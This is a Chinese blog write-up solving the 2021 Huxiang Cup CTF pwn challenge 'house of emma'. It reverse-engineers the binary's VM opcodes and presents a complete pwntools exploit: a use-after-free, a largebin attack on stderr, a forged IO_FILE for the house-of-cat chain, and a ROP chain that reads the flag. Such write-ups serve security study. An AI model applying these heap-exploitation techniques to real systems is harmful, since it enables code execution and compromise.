2021湖湘杯house of emma

最新推荐文章于 2023-12-11 10:28:12 发布
最新推荐文章于 2023-12-11 10:28:12 发布
阅读量432 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/127374315
版权

目录

前言

先贴出博文https://www.anquanke.com/post/id/260614
wjh大佬提出的几条利用链,用虚表偏移的思想,跳转到_IO_cookie_file这类函数,要绕过位于TLS上的PTR_DEMANGLE (指针保护),才能任意函数指针调用。但如今其他大佬提出如house of apple,house of cat等更方便的利用链,这题我就用house of cat的利用链来解

例题:2021湖湘杯house of emma

程序分析

VM分析:

保护全开,沙盒禁用了execve

main函数中有个无限循环,提示我们输入opcode,(可以想到是个vm类型的了)
读我们的指令到s后会到sub_1288这个函数,跟进
请添加图片描述
跳到0x128a
请添加图片描述

请添加图片描述
请添加图片描述

mov byte ptr [rbp-1], 0 ;就是把rbp-1单个字节赋0
movzx eax, byte ptr [rax] ;就是rax单字节零扩展,赋到eax
and eax, 0Fh ;取一位
mov [rbp-1], al ;这里的al就是等于上面取的那一位
cmp eax, 10h ;eax与0x10比较

请添加图片描述
unk_203c长度0x44,可以switch 0x11种
在这里插入图片描述
如何确定opcode?:
如果选add命令:
在地址0x13DD
0x13DD-0x203C=0xFF FF F3 A1,rax=1,所以opcode是\x01
选delete命令:
0x1404-0x203C=0xFF FF F3 C8 ,rax=2,所以opcode是\x02
选show命令:
0x1428-0x203C=0xFF FF F3 EC,rax=3,opcode是\x03
选edit命令:
0x144C-0x203C=0xFF FF F4 10,rax=4,opcode是\x04

0x13DD地址前面的一些基本的运算指令switch根本选不到,只能选到与堆操作相关的指令

.text:00000000000013DD ; ---------------------------------------------------------------------------
.text:00000000000013DD                 mov     rax, [rbp-18h]
.text:00000000000013E1                 mov     rdi, rax
.text:00000000000013E4                 mov     eax, 0
.text:00000000000013E9                 call    add
.text:00000000000013EE                 add     qword ptr [rbp-18h], 4
.text:00000000000013F3                 lea     rdi, aMallocDone ; "Malloc Done"
.text:00000000000013FA                 call    _puts
.text:00000000000013FF                 jmp     loc_1495
.text:0000000000001404 ; ---------------------------------------------------------------------------
.text:0000000000001404                 mov     rax, [rbp-18h]
.text:0000000000001408                 mov     rdi, rax
.text:000000000000140B                 mov     eax, 0
.text:0000000000001410                 call    delete
.text:0000000000001415                 add     qword ptr [rbp-18h], 2
.text:000000000000141A                 lea     rdi, aDelDone   ; "Del Done"
.text:0000000000001421                 call    _puts
.text:0000000000001426                 jmp     short loc_1495
.text:0000000000001428 ; ---------------------------------------------------------------------------
.text:0000000000001428                 mov     rax, [rbp-18h]
.text:000000000000142C                 mov     rdi, rax
.text:000000000000142F                 mov     eax, 0
.text:0000000000001434                 call    show
.text:0000000000001439                 add     qword ptr [rbp-18h], 2
.text:000000000000143E                 lea     rdi, aShowDone  ; "Show Done"
.text:0000000000001445                 call    _puts
.text:000000000000144A                 jmp     short loc_1495
.text:000000000000144C ; ---------------------------------------------------------------------------
.text:000000000000144C                 mov     rax, [rbp-18h]
.text:0000000000001450                 mov     rdi, rax
.text:0000000000001453                 mov     eax, 0
.text:0000000000001458                 call    edit
.text:000000000000145D                 mov     rax, [rbp-18h]
.text:0000000000001461                 add     rax, 2
.text:0000000000001465                 movzx   eax, word ptr [rax]
.text:0000000000001468                 movzx   eax, ax
.text:000000000000146B                 add     rax, 4
.text:000000000000146F                 add     [rbp-18h], rax
.text:0000000000001473                 lea     rdi, aEditDone  ; "Edit Done"
.text:000000000000147A                 call    _puts
.text:0000000000001481 ; ---------------------------------------------------------------------------
.text:0000000000001481                 mov     eax, 0
.text:0000000000001486                 jmp     short locret_149A

接下来看add函数
请添加图片描述
可以得出add的opcode= \x01+p8(idx)+p16(size)
同理依次得出
delete的opcode= \x02+p8(idx)
show的opcode=\x03+p8(idx)
edit的opcode=\x04+p8(idx)+p16(size)+buf

我们输入完opcode还要选个功能退出这个函数,在地址0x1481,不然会一直读opcode
选项\x5的话
0xFF FF F4 35=0x1471-0x203c
对应的地址是0x1471,虽然不是我们要的地址0x1481,但因为在其前面勉强可以,
选项\x06的话就在它地址后面就不行了

所以退出函数opcode=\x05即可

功能分析:

add只用calloc,最多idx大小小于0x10,size限制为[0x410,0x500]
请添加图片描述
存在uaf漏洞
请添加图片描述
常规的show

常规的edit
请添加图片描述

攻击步骤:

1.largebin attack改stderr为堆地址
2.堆地址上写入fake_IO,在其他堆上写入orw语句
3.uaf改top chunk size,触发malloc_assert,触发house of cat 利用链,跳转到setconext,执行orw读取flag

exp:

from pwn import * 
local_file  = './pwn'
local_libc  = './libc.so.6'
remote_libc = './libc.so.6'
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
elif select == 1:
    r = remote('node4.buuoj.cn',25904 )
    libc = ELF(remote_libc)
else:
    r = gdb.debug(local_file)
    libc = ELF(local_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4,b'\0'))
uu64    = lambda data               :u64(data.ljust(8,b'\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
     gdb.attach(r,cmd)
#------------------------
all_payload=b''
def add(idx,size):
    global all_payload
    all_payload +=p8(1)+p8(idx)+p16(size)

def delete(idx):
    global all_payload
    all_payload +=b'\x02'+p8(idx)
    
def show(idx):
    global all_payload
    all_payload +=b'\x03'+p8(idx)

def edit(idx,buf):
    global all_payload
    all_payload +=b'\x04'+p8(idx)+p16(len(buf))+buf

def run():
    global all_payload
    ru('Pls input the opcode\n')
    all_payload+=b'\x05'
    se(all_payload)
    all_payload=b''
#--------leak_libc,leak_heap-----------
add(0,0x410)
add(1,0x410)
add(2,0x420)
add(3,0x410)
delete(2)
show(2)
run()
libc_base=uu64(ru('\x7f')[-6:])-0x1f2cc0
info('libc_base',libc_base)
edit(2,b'a'*0x10)
show(2)
run()
ru('a'*0x10)
heap_base=uu64(rc(6))-0x2ae0
info('heap_base',heap_base)
stderr  = libc_base + libc.sym['stderr']
pop_rdi = libc_base + next(libc.search(asm('pop rdi\nret')))
pop_rsi = libc_base + next(libc.search(asm('pop rsi\nret')))
pop_rax = libc_base + next(libc.search(asm('pop rax\nret')))
syscall = libc_base + next(libc.search(asm('syscall\nret')))
pop_rdx_r12=libc_base+0x1066e1
setcontext=libc_base+libc.sym['setcontext']
ret=libc_base+0x2d446
read=libc_base+libc.sym['read']
write=libc_base+libc.sym['write']
#-------------largebin_attack stderr-------------------------
edit(2,p64(libc_base+0x1f2cc0)*2)
delete(0)
edit(2,p64(libc_base+0x1f2cc0)*2+p64(heap_base+0x2ae0)+p64(stderr-0x20))
add(4,0x430)
edit(2,p64(heap_base+0x22a0)+p64(libc_base+0x1f30b0)+p64(heap_base+0x22a0)*2)
edit(0,p64(libc_base+0x1f30b0)+p64(heap_base+0x2ae0)*3)
add(2,0x420)
add(0,0x410)
run()
#------------------------IO_file,orw-------------------------
fake_io_addr=heap_base+0x22a0
next_chain = 0
fake_IO_FILE  =p64(0)*6
fake_IO_FILE +=p64(1)+p64(0)
fake_IO_FILE +=p64(fake_io_addr+0xb0)#_IO_backup_base=rdx
fake_IO_FILE +=p64(setcontext+0x3d)#_IO_save_end=call addr(call setcontext/system)
fake_IO_FILE  =fake_IO_FILE.ljust(0x58,b'\x00')
fake_IO_FILE +=p64(0)  # _chain
fake_IO_FILE  =fake_IO_FILE.ljust(0x78,b'\x00')
fake_IO_FILE += p64(heap_base+0x200)  # _lock = writable address
fake_IO_FILE = fake_IO_FILE.ljust(0x90,b'\x00')
fake_IO_FILE +=p64(fake_io_addr+0x30) #rax1
fake_IO_FILE = fake_IO_FILE.ljust(0xB0,b'\x00')
fake_IO_FILE += p64(1)  # _mode = 1
fake_IO_FILE = fake_IO_FILE.ljust(0xC8,b'\x00')
fake_IO_FILE += p64(libc_base+0x1f4020+0x10)  # vtable=_IO_wfile_jumps+0x10
fake_IO_FILE +=p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x40)  # rax2_addr

payload1=fake_IO_FILE+p64(0)*7+p64(heap_base+0x3780)+p64(ret)

edit(0,payload1)
add(5,0x410)
flag_addr=0x3ba0+heap_base
orw=flat(pop_rdi,flag_addr,pop_rsi,0,pop_rax,2,syscall)
orw+=flat(pop_rdi,3,pop_rsi,flag_addr,pop_rdx_r12,0x50,0,read)
orw+=flat(pop_rdi,1,pop_rsi,flag_addr,pop_rdx_r12,0x50,0,write)
edit(5,orw)
#---------------uaf_change_top_chunk---------------
add(6,0x430)
delete(6)
add(7,0x410)
run()
edit(6,b'flag\x00\x00\x00\x00'+b'\x00'*0x408+p64(0)+p64(0x300))
add(8,0x450)
#gdb.attach(r,'b*_IO_wfile_seekoff')
run()
r.interactive()

请添加图片描述

Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2.27 house of botcake例题附件
05-31
2.27 house of botcake例题附件
House of Fun Free Coins-crx插件
04-06
House of Fun免费硬币将帮助您获得免费硬币和House of Fun的免费旋转。 我们将使用我们的秘密方法为您的帐户生成硬币。 House of Fun免费硬币是在网上免费获得Fun Spins和硬币的最佳方法。 代币大师旁边最受欢迎的...
2021湖湘
qq_48511129的博客
11-24 646
Web easywill 发现这里可以进行本地文件包含 http://eci-2zec2ffu8ckzf4ciogou.cloudeci1.ichunqiu.com/?name=cfile&value=…/…/…/…/…/…/etc/passwd 参考下面链接的pearcmd.php的巧妙利用 https://tttang.com/archive/1312/ 构造payload ?name=cfile&+config-create+/&value=…/…/…/usr/local/li
2021湖湘 Hideit Writeup
qq_41866334的博客
11-15 3211
2021湖湘 Hideit AAA : immortal 动态调试 直接x64dbg动调找到了关键的加密代码分别是xxtea 和 chacha20,直接动调从中拿出各种参数然后写代码进行解密。其实一开始没看出来chacha20,找到了这篇文章 逆向中常见的Hash算法和对称加密算法的分析 . 解密dll 后来在赛后和队友交流发现这题其实在数据段放了一个加密的dll文件,在解密段可以x64dbg dump出dll的代码。断点下在memncpy上,解密结束后就可以dump出对应的地址,删去pe头之前的
2021年--湖湘--final
unexpectedthing的博客
04-28 1364
21年湖湘比赛
2021-湖湘final-Web
feng的博客
01-05 2099
2021-湖湘final-Web 前言 今年湖湘报的社企组的结果就是最后只能摆烂,然后决赛那段时间正好在复习期末,然后考完了想好好的休息一段时间,打游戏打累了再来复现一下湖湘final的题目放松放松。 vote 今年HTB的基本上算是原题了,复现的时候才发现当时做那题的时候就摆烂没管了,所以一点印象没有。。。 const path = require('path'); const express = require('express'); const pug
[湖湘 2021 final]MultistaeAgency
最新发布
rev1ve的博客
12-11 842
路由的执行bash命令,参数为cmd,不过cmd的值是由参数m拼接后的,所以我们可以自己创建cmd值从环境变量中获取,这样执行的就是我们的恶意命令。代码审计完后整理下,web的main.go的getToken函数环境变量可控的,那么我们可以LD_PRELOAD绕过,RCE的关键地方就是。那么我们可以绕过对m的waf,然后反弹shell到的靶机上用curl命令去弹。我们正常的命令执行是通过参数m来控制,并且监听的是9091端口。上传文件,然后F12在网络处发现token值,得到的方法是。
system_of_house_measure.rar_house
09-21
《房屋测量系统详解》 在数字化时代,房屋测量已经不再局限于传统的实地测量工具,而是借助先进的计算机技术,形成了一套高效、精准的房屋测量系统。本文将深入探讨这个系统的基本构成,以及它如何集成地图软件要素...
house of banana .pdf
09-05
House of Banana:深入理解安全实践与堆利用技术》 在信息安全领域,攻击者不断寻找新的漏洞和利用手段,以突破系统防御。"House of Banana"是一种针对glibc库的新型堆利用技术,自glibc 2.28版本以来,由于其...
2020年第六届“湖湘”网络安全技能大赛洞庭决赛第一场-理论答题赛
11-11
第六届“湖湘”网络安全技能大赛洞庭决赛第一场-理论答题赛200道原题,答题的时候保存的,跟大家分享一下,希望有需要的小伙伴可以自行学习一下。
house-of-leaves
07-04
House of Leaves》是一部独特的文学作品,以其复杂的叙事结构和视觉实验而闻名。在这个场景中,我们关注的不是书籍本身,而是与之相关的Chrome扩展程序。这个扩展程序以"house-of-leaves"为名,其功能是将网页上...
湖湘2021-pwn-final部分复现
qq_53062301的博客
12-09 4920
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
house_of_emma(2021 湖湘)
m0_63437215的博客
11-08 493
house_of_emma
2021湖湘wp_web
meteox的博客
11-15 4184
easywill will框架,版本是1.51,直接gitee下载源码回退版本即可https://gitee.com/willphp/willphpv2 该框架参考了thinkphp,开头首页给出了assign($name,$value)渲染,然后return了view(),thinkphp有个相关的文件包含漏洞和这个很像 https://www.freebuf.com/column/207878.html 从view->fetch->render->renderTo逐步跟进,发现有变量覆
x_nuca_2018_offbyone2(off by null,unlink造成doublefree)
m0_51251108的博客
11-19 3195
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
BUUCTF刷题3
m0_51251108的博客
05-26 2747
题目:pwnable_start:wustctf2020_closed:hitcontraining_heapcreator:0ctf_2017_babyheap:ciscn_2019_es_7:jarvisoj_level5:hitcontraining_bamboobox: pwnable_start: 关键词: 汇编,泄露ebp,调试 思路: 1.查看汇编代码得知题目信息,发现read处可0x14后可溢出 2.依靠其中的write,是根据esp来确定打印addr,选择覆盖ret地址为write那里,便
pwnlib.exception.PwnlibException: Could not find ‘as‘ installed for ContextType报错解决
m0_51251108的博客
09-20 1757
做arm架构下的pwn题某个报错
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1750
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值